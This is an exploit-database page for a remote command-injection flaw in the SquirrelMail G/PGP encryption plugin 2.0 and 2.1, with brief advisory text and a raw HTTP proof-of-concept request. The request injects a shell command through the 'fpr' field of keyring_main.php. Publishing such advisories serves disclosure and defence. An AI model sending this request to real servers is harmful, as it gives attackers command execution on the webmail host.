header-logo
Suggest Exploit
vendor:
SquirrelMail
by:
Unknown
7.5
CVSS
HIGH
Remote Command Execution
Unknown
CWE
Product Name: SquirrelMail
Affected Version From: SquirrelMail G/PGP 2.0
Affected Version To: SquirrelMail G/PGP 2.1
Patch Exists: Unknown
Related CWE: Unknown
CPE: a:squirrelmail:squirrelmail
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Vulnerabilities in SquirrelMail G/PGP Encryption Plugin

The SquirrelMail G/PGP encryption plugin in SquirrelMail 2.0 and 2.1 allows malicious webmail users to execute system commands remotely due to insufficient sanitization of user-supplied data. The commands run within the context of the webserver hosting the vulnerable software.

Mitigation:

No further technical details are currently available.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24828/info

Vulnerabilities in the SquirrelMail G/PGP encryption plugin may allow malicious webmail users to execute system commands remotely. These issues occur because the application fails to sufficiently sanitize user-supplied data.

Commands would run in the context of the webserver hosting the vulnerable software.

Reports indicate that these vulnerabilities reside in SquirrelMail G/PGP 2.0 and 2.1 and that the vendor is aware of the issues. This has not been confirmed.

No further technical details are currently available. We will update this BID as more information emerges. 

$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1